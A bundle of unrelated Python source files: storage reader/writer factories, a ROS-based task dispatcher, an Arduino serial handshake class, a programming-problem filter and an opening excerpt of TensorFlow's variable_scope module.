class ImageReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
    def read(self, path) -> Image.Image:
return Image.open(io.BytesIO(self.reader.read(path)))
class NumpyReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path) -> Union[np.ndarray, dict]:
if path.endswith("npz"):
with np.load(io.BytesIO(self.reader.read(path))) as data:
return dict(data)
return np.load(io.BytesIO(self.reader.read(path)))
class JsonReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
    def read(self, path) -> Union[dict, list]:
return json.load(io.BytesIO(self.reader.read(path)))
def build_reader(store_type: str, data_type: str, **kwargs) -> Reader:
if store_type == StoreType.LOCAL.type_name:
reader = LocalReader()
elif store_type == StoreType.OSS.type_name:
reader = OssReader(**kwargs)
else:
raise ValueError(f"Unknown store type: {store_type}")
if data_type == DataType.BYTES.type_name:
return BytesReader(reader)
elif data_type == DataType.IMAGE.type_name:
return ImageReader(reader)
elif data_type == DataType.NUMPY.type_name:
return NumpyReader(reader)
elif data_type == DataType.JSON.type_name:
return JsonReader(reader)
elif data_type == DataType.DUMMY.type_name:
return DummyReader(reader)
else:
raise ValueError(f"Unknown data type: {data_type}")
class Writer(object):
def write(self, path: str, data: Any):
raise NotImplementedError
class OssWriter(Writer):
def __init__(self, oss_config: str):
self.bucket = create_oss_bucket(oss_config)
def write(self, path, data: bytes):
return self.bucket.put_object(path, data)
class LocalWriter(Writer):
def write(self, path, obj: bytes):
        with open(path, 'wb') as f:
            return f.write(obj)
class BytesWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path: str, data: Union[bytes, str]):
if isinstance(data, str):
data = data.encode('utf-8')
return self.writer.write(path, data)
class ImageWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
def write(self, path: str, data: np.ndarray):
ext = os.path.splitext(path)[-1]
ret, img = cv2.imencode(ext, data)
return self.writer.write(path, img.tobytes())
class NumpyWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
    def write(self, path: str, data: Union[np.ndarray, dict, list]):
        output = io.BytesIO()
        if path.endswith("npz"):
            if isinstance(data, list):
                np.savez(output, *data)
            elif isinstance(data, dict):
                np.savez(output, **data)
            else:
                raise ValueError('invalid type: {} to save to {}'.format(type(data), path))
        else:
            if isinstance(data, np.ndarray):
                np.save(output, data)
            else:
                raise ValueError('invalid type: {} to save to {}'.format(type(data), path))
output = output.getvalue()
return self.writer.write(path, output)
class JsonWriter(Writer):
def __init__(self, writer: Writer):
self.writer = writer
    def write(self, path: str, data: Union[List, Dict, bytes, str]):
        if isinstance(data, (list, dict)):
            output = json.dumps(data, ensure_ascii=False).encode(encoding='utf-8')
        elif isinstance(data, bytes):
            output = data
        elif isinstance(data, str):
            output = data.encode('utf-8')
        else:
            raise ValueError('invalid type: {} to save to {}'.format(type(data), path))
        return self.writer.write(path, output)
def build_writer(store_type: str, data_type: str, **kwargs) -> Writer:
if store_type == StoreType.LOCAL.type_name:
writer = LocalWriter()
elif store_type == StoreType.OSS.type_name:
writer = OssWriter(**kwargs)
else:
raise ValueError(f"Unknown store type: {store_type}")
if data_type == DataType.BYTES.type_name:
return BytesWriter(writer)
elif data_type == DataType.IMAGE.type_name:
return ImageWriter(writer)
elif data_type == DataType.NUMPY.type_name:
return NumpyWriter(writer)
elif data_type == DataType.JSON.type_name:
return JsonWriter(writer)
else:
raise ValueError(f"Unknown data type: {data_type}")
class AsyncWriter(object):
def __init__(self, pool_size: int, store_type: str, data_type: str, **config):
self.pool_size = pool_size
self.writer = build_writer(store_type=store_type, data_type=data_type, **config)
self.in_queue = Queue()
self.eof_sig = [None, None]
def worker_loop(writer: Writer, in_queue: Queue):
while True:
path, data = in_queue.get()
if path is None and data is None:
logger.info("Finish processing, exit...")
break
writer.write(path, data)
self.workers = []
for _ in range(self.pool_size):
p = Process(target=worker_loop, args=(self.writer, self.in_queue))
p.start()
self.workers.append(p)
def consume(self, data: Tuple[str, Any]):
self.in_queue.put(data)
def stop(self):
for _ in range(self.pool_size):
self.in_queue.put(self.eof_sig)
for p in self.workers:
p.join()
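# The demo below is a minimal, hedged sketch (not part of the original module)
# of how the factories above compose: it round-trips a small JSON payload
# through build_writer / build_reader with the local store. The file name
# "ioutil_demo.json" is an arbitrary choice for illustration.
if __name__ == "__main__":
    demo_path = "ioutil_demo.json"
    writer = build_writer(store_type="local", data_type="json")
    writer.write(demo_path, {"hello": "world", "answer": 42})
    reader = build_reader(store_type="local", data_type="json")
    print(reader.read(demo_path))  # -> {'hello': 'world', 'answer': 42}
    os.remove(demo_path)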
|
dispatcher.py
|
#!/usr/bin/python
'''
# =====================================================================
# Abstract PDRA dispatcher class
#
# Author: Marc Sanchez Net
# Date: 01/29/2019
# Copyright (c) 2019, Jet Propulsion Laboratory.
# =====================================================================
'''
# General imports
import abc
import ast
from Queue import PriorityQueue
from threading import Thread
import threading
# ROS imports
import rospy
# PDRA imports
from pdra.core import Obligation, Result
from pdra.utils import load_class_dynamically, now
# =====================================================================
# === Global variables
# =====================================================================
# Max size for the dispatcher queues. 0 = infinity
MAX_QUEUE_SIZE = 0
PUB_QUEUE_SIZE = 100
# Default timeout for a resource
RES_TIMEOUT = 600
# =====================================================================
# === Dispatchable Implementation
# =====================================================================
class Dispatcher(object):
""" Abstract dispatcher class.
:ivar string: agent_id
:ivar PriorityQueue: _up_queue
:ivar PriorityQueue: _dn_queue
:ivar dict: ohandlers
:ivar dict: rhandlers
:ivar object: chandler
"""
__metaclass__ = abc.ABCMeta
def __init__(self, agent_id):
""" Class constructor
:param string: Agent ID
"""
# Store variables
self.agent_id = agent_id
# Incoming queue (from back-end up to front-end)
self._up_queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Outgoing queue (from front-end to back-end)
self._dn_queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Communication Handler
self.chandler = None
# Dictionary {resource_id: obligation_handler object}
self.ohandlers = {}
# Dictionary {resource_id: resource_handler object}
self.rhandlers = {}
# Exit all threads upon rospy shutdown
rospy.on_shutdown(self._shutdown_dispatcher)
# Run the dispatcher and acceptor
self.run()
@abc.abstractmethod
def where_to_process(self, *args, **kwargs):
pass
@abc.abstractmethod
def process_rac_output(self, *args, **kwargs):
pass
def run(self):
# Start forwarder in a separate thread
self.th_fwdr = Thread(target=self._run_forwarder)
self.th_fwdr.setDaemon(True)
self.th_fwdr.start()
# Start acceptor in a separate thread
self.th_acptr = Thread(target=self._run_acceptor)
self.th_acptr.setDaemon(True)
self.th_acptr.start()
def _shutdown_dispatcher(self):
# Signal the forwarder and acceptor that they must exit
self._up_queue.put_nowait((-float('inf'), 'exit'))
self._dn_queue.put_nowait((-float('inf'), 'exit'))
# Stop all obligation handlers
for oh in self.ohandlers.values():
oh._shutdown()
# Stop all resource handlers
for rh in self.rhandlers.values():
rh._shutdown()
def _run_forwarder(self):
""" The forwarder pulls from ``self._dn_queue`` and directs the
dispatchable depending on the RAC input
"""
while True:
# Get the next dispatchable. If empty, block
priority, dsp = self._dn_queue.get(True)
# If dsp signals exit, you are done
if dsp == 'exit':
break
# Check if this dispatchable is valid. If not, log error
if not dsp.valid:
self._logerr('[Forwarder] Invalid dispatchable:\n Requesting agent is {}\nType is {}\nResource ID is {}\n TTL is {}, creation time is {}, and now is {} (remaining TTL {})'.format(
dsp.req_agent, dsp.type, dsp.resource_id, dsp.TTL, dsp.creation_time, now(), -(now()-dsp.creation_time) + dsp.TTL))
self._logerr("srv_agent: {}, uid: {}, resource_id: {}, req_agent: {}, creation_time: {}, priority: {}, version: {}".format(
dsp.srv_agent,
dsp.uid,
dsp.resource_id,
dsp.req_agent,
dsp.creation_time,
dsp.priority,
dsp.version,
# dsp.values[:100],
))
continue
# If this dispatchable is a result, send it through the comm handler
if dsp.type == 'Result':
self.chandler._send_dispatchable(
dsp.srv_agent, dsp.req_agent, dsp)
continue
# If this dispatchable is an obligation, get the agent that must
# process it
srv_agent = self.where_to_process(dsp)
# If the serving agent is not the local agent, send it
if srv_agent not in (None, "UNKNOWN", self.agent_id):
self.chandler._send_dispatchable(dsp.req_agent, srv_agent, dsp)
continue
# If srv_agent is "None", the RAC thinks this should not be done.
# Create a crude result and bounce.
# TODO: we do not know the values expected by the obligation handler,
# since we have no idea of its internal format. So we just write our
# displeasure all over the serial stream.
if srv_agent is None:
# self._logerr('Resource {} not known by RAC. Attempting to satisfy locally'.format(
# dsp.resource_id))
self._logerr('Resource {} should not be executed according to RAC. Skipping!'.format(
dsp.resource_id))
bounced_result = Result.from_obligation(dsp,
srv_agent=self.agent_id,
values="BOUNCED")
self._new_result(bounced_result)
continue
# If srv_agent is "UNKNOWN", show message that you will default to local execution.
if srv_agent == "UNKNOWN":
self._logerr('Resource {} not known by RAC. Attempting to satisfy locally'.format(
dsp.resource_id))
# Send a new obligation to a local resource. If it is not available, just
# abandon it for now. TODO: Trigger some cancellations
try:
self.rhandlers[dsp.resource_id]._new_obligation(dsp)
except KeyError:
self._logerr(
'Resource {} is not available locally'.format(dsp.resource_id))
self._logerr('Resources available are {}'.format(
self.rhandlers.keys()))
def _run_acceptor(self):
""" The acceptor pulls from ``self._up_queue`` and directs the result
depending on whether it is local or remote.
"""
while True:
# Get the next result. If empty, block
priority, dsp = self._up_queue.get(True)
# If res signals exit, you are done
if dsp == 'exit':
break
# Check if this dispatchable is valid. If not, log error
if not dsp.valid:
self._logerr('Invalid result at acceptor:\n Requesting agent is {}\nType is {}\nResource ID is {}\n TTL is {}, creation time is {}, and now is {} (remaining TTL {})'.format(
dsp.req_agent, dsp.type, dsp.resource_id, dsp.TTL, dsp.creation_time, now(), -(now()-dsp.creation_time) + dsp.TTL))
self._logerr("srv_agent: {}, uid: {}, resource_id: {}, req_agent: {}, creation_time: {}, priority: {}, version: {}".format(
dsp.srv_agent,
dsp.uid,
dsp.resource_id,
dsp.req_agent,
dsp.creation_time,
dsp.priority,
dsp.version,
# dsp.values[:100],
))
# self._logerr(dsp.to_json())
continue
# If this is an obligation coming from the comm handler, pass it to
# forwarder directly
if dsp.type == 'Obligation':
self._new_obligation(dsp)
continue
# If this result has dependents, create a dependent obligation and
# pass it to the forwarder for processing
if dsp.dependents is not None:
self._create_dependent(dsp)
continue
# If this result's requesting agent is not this agent, pass to forwarder
# so that it sends it using the comm handler
if dsp.req_agent != self.agent_id:
self._new_obligation(dsp)
continue
# If you reach this point, this result is for this agent. To see which resource
# triggered this (potential chain of) result(s), look at the predecessors
if not any(dsp.predecessors):
resource_id = dsp.resource_id
else:
resource_id = dsp.predecessors[0]['resource_id']
# Send the result to the appropriate obligation handler
try:
self.ohandlers[resource_id]._new_result(dsp)
except KeyError:
self._logerr(
'Obligation handler for resource {} is not available'.format(resource_id))
self._logerr('Obligation handlers are {}'.format(
self.ohandlers.keys()))
def _create_dependent(self, result):
self._loginfo('Creating dependent obligation from {}'.format(result))
# Get the next dependent resource
resource_id = result.dependents.pop(0)
        # If the list of dependents is empty, reset to None
if not any(result.dependents):
result.dependents = None
# Get the parameters of the dependent obligation as the values
# from the current result
params = result.values
# Create new obligation
obl = Obligation.from_result(result, resource_id, params)
# Enqueue new obligation for processing
self._new_obligation(obl)
def _new_obligation(self, dsp):
# Put the obligation in the outgoing queue to process
self._dn_queue.put_nowait((dsp.priority, dsp))
def _new_result(self, res):
# Put the result in the incoming queue to process
self._up_queue.put_nowait((res.priority, res))
def _add_obligation_handler(self, oh_id, oh_type, directory='.', **kwargs):
# Get handler class
self.ohandlers[oh_id] = self._new_handler(
oh_id, oh_type, directory, **kwargs)
def _add_resource_handler(self, rh_id, rh_type, directory='.', **kwargs):
# Store new handler
self.rhandlers[rh_id] = self._new_handler(
rh_id, rh_type, directory, **kwargs)
def _add_comm_handler(self, ch_id, ch_type, directory='.', **kwargs):
# Store new handler
self.chandler = self._new_handler(ch_id, ch_type, directory, **kwargs)
def _new_handler(self, resource_id, handler_type, directory, **kwargs):
# Separate module and class name
module, class_name = handler_type.split('.')
# Load the class definition to be created
cls = load_class_dynamically(directory, module, class_name=class_name)
# Create the obligation handler object
return cls(self, self.agent_id, resource_id, **kwargs)
def _logerr(self, msg):
rospy.logerr("[{}/dispatcher]: {}".format(self.agent_id, msg))
def _logwarn(self, msg):
rospy.logwarn("[{}/dispatcher]: {}".format(self.agent_id, msg))
def _loginfo(self, msg):
rospy.loginfo("[{}/dispatcher]: {}".format(self.agent_id, msg))
# =====================================================================
# === Function to start the dispatcher
# =====================================================================
def start_dispatcher(cls):
# Get agent id
aid = rospy.get_param('~agent_id')
# Get the source directory for all handlers
source_dir = rospy.get_param('~source_dir')
# Get name and type of obligation handlers
ohandlers = ast.literal_eval(rospy.get_param('~ohandlers', '{}'))
# Get the parameters for the obligation handlers
oparams = ast.literal_eval(rospy.get_param('~ohandler_params', '{}'))
# Get name and type of resource handlers
rhandlers = ast.literal_eval(rospy.get_param('~rhandlers', '{}'))
    # Get the parameters for the resource handlers
rparams = ast.literal_eval(rospy.get_param('~rhandler_params', '{}'))
# Get the type of comm handler
ch_type = rospy.get_param('~chandler', '')
    # Get the parameters for the comm handler
cparams = ast.literal_eval(rospy.get_param('~chandler_params', '{}'))
# Create the dispatcher
dispatcher = cls(aid)
# Add the comm handler
dispatcher._add_comm_handler(
'comm', ch_type, directory=source_dir, **cparams)
# Add all obligation handlers
for oh_id, oh_type in ohandlers.iteritems():
dispatcher._add_obligation_handler(oh_id, oh_type, directory=source_dir,
**oparams.get(oh_id, {}))
    # Add all resource handlers
for rh_id, rh_type in rhandlers.iteritems():
dispatcher._add_resource_handler(rh_id, rh_type, directory=source_dir,
**rparams.get(rh_id, {}))
# Wait until rospy shutdown
rospy.spin()
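# A minimal subclass sketch (not part of the original module) showing how a
# concrete dispatcher could plug into start_dispatcher(). It assumes it runs
# inside a ROS node with the ~agent_id, ~source_dir, ~ohandlers, ~rhandlers and
# ~chandler parameters set, as read above; the class and node names below are
# made up for illustration.
class LocalOnlyDispatcher(Dispatcher):
    """Toy dispatcher that always keeps obligations on the local agent."""
    def where_to_process(self, dsp):
        # Always claim the obligation for this agent (no RAC consultation).
        return self.agent_id
    def process_rac_output(self, *args, **kwargs):
        # No resource-allocation component in this sketch; nothing to process.
        pass
if __name__ == '__main__':
    rospy.init_node('pdra_local_dispatcher')
    start_dispatcher(LocalOnlyDispatcher)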
|
ArduinoConection.py
|
"""
* @author Kai Fischer
* @email kathunfischer@googlemail.com
* @desc Class to encapsulate the communication to the arduino using a serial com-port connection
"""
import serial
import time
import json
import serial.tools.list_ports
from threading import Thread
from userDefaultsHandler import getUUIDFromSettings
from helperClasses import DataBaseUtilities
class ArduinoConection:
def write(self, msg):
try:
self.__serCon.write(msg)
except serial.SerialTimeoutException:
self.__serCon = None
except Exception as e:
print("error from write:")
print(e)
def readline(self):
msg = ""
msg = self.__serCon.readline()
return msg
    # returns whether an Arduino is connected to the host or not
    def getArdConState(self):
        # if no connection or error in connection
        if (self.__serCon is None):
            # try to get a new connection in the background
            if (not self.SearchArdThread.is_alive()):
                self.SearchArdThread = Thread(target=self.__getSerCon)
                self.SearchArdThread.start()
            return False
        else:
            return True
    # returns whether another Arduino to communicate with was found or not
def getArdComState(self):
return self.__conToArd
def resetArdCon(self):
self.__serCon = None
def __startComListener(self):
raise NotImplementedError
    # searches all local ports for connected Arduinos, then checks if they respond correctly
    # returns the serial connection to the first correctly responding Arduino
def __getSerCon(self):
self.__serCon = None
AllPorts = list(serial.tools.list_ports.comports())
for port in AllPorts:
# Handshake Process
testCon = serial.Serial(
port=port.device, baudrate=115200, timeout=2, write_timeout=2)
# on each new connection the arduino will restart, waiting for it
time.sleep(2)
testCon.write(str.encode("~echo~\n"))
answer = testCon.readline()
if (answer == str.encode("~ping~\n")):
                # search successful
                # set guid
                # wait for response -> check if the guid was correctly received
testCon.write(str.encode(str(self.__localId) + "\n"))
answer = testCon.readline()
if (answer != str.encode("~okay~\n")):
print("handshake failed")
self.__serCon = None
continue
else:
                    # handshake successful
self.__serCon = testCon
break
return
def IsSerCon(self):
return self.__serCon != None
def __init__(self):
self.__localId = json.loads(json.dumps(getUUIDFromSettings()))['value']
print(self.__localId)
self.partnerId = None
self.__serCon = None
self.SearchArdThread = Thread()
self.getArdConState()
self.__conToArd = True
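# Minimal usage sketch (not part of the original class). It assumes an Arduino
# running the matching handshake firmware is attached over a serial port and
# that userDefaultsHandler can supply a UUID; "~echo~" mirrors the handshake
# probe used in __getSerCon above.
if __name__ == "__main__":
    conn = ArduinoConection()
    if conn.getArdConState():
        conn.write(str.encode("~echo~\n"))
        print(conn.readline())
    else:
        print("no Arduino connected yet; still searching in the background")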
|
inter.py
|
import threading
import pickle
from problems import problems
from contestant import contestant
from connection import connection
import time
class inter:
def __init__(self,info):
self.loadedbase = problems.loadbase()
self.base = self.loadedbase['base']
self.basetime = self.loadedbase['time']
self.info = info
self.org = "new"
self.org = True
self.handlesfile = 'handles'
self.tagsfile = 'tags'
def gettags(self):
return problems.getalltags(self.base)
def connectthreading(self,handles):
        self.thread = threading.Thread(target=self.connect, args=(handles,))
self.thread.start()
def connect(self,handles):
self.connectioninfo = connection(contestant,handles).donemembers
def submit(self):
print('self.org',self.org)
if self.org == True:
self.parse()
elif self.org==False:
self.connectthreading(self.info['handles'])
            self.thread.join()
self.org=False
contestantsinfo = self.connectioninfo
probs = self.getprobs(self.info['tags'],self.info['tagoption'])
# print('tags',self.info['tags'],self.info['tagoption'])
probs = self.filterprobs(probs,contestantsinfo,self.info['filteroption'])
# print('probs',probs)
if len(probs)==0:
probs =['None found']
file = open('problems.txt','w',encoding='UTF-8')
for i in probs:
print(i,file = file)
file.close()
def getprobs(self,tags,tagoption):
probs = set()
if(tagoption==1):
probs = problems.containOnlyTags(self.base,tags)
elif(tagoption==2):
probs = problems.containSomeTags(self.base,tags)
elif(tagoption==3):
probs = problems.containAllTags(self.base,tags)
return probs
def filterprobs(self,probs,contestants,filteroption):
if filteroption ==1:
probs = problems.filterSubmissions(probs,contestants)
elif filteroption==2:
probs = problems.filterAccepted(probs,contestants)
return probs
def updatebase(self):
self.loadedbase = problems.updatebase()
self.base = self.loadedbase['base']
self.basetime = self.loadedbase['time']
def parse(self):
info=self.info
self.info={'handles':info.handles,'tagoption':info.tagoption.get(),'filteroption':info.filteroption.get(),'tags':info.tags}
def loadlast(self,filename):
print(f'loading from {filename}...')
file=open(filename,'rb')
load = pickle.load(file)
file.close()
return load
def picklelast(self,filename,tosave):
        print('pickling data...')
file = open(filename,'wb')
pickle.dump(tosave,file)
file.close()
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
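  # Worked example (illustrative values, not part of the original code): for a
  # variable with full_shape=[10, 20] split into two shards along dimension 1,
  # the shard at var_offset=[0, 10] with shape=[10, 10] yields
  # single_slice_dim(shape) == 1 and single_offset(shape) == 10.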
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
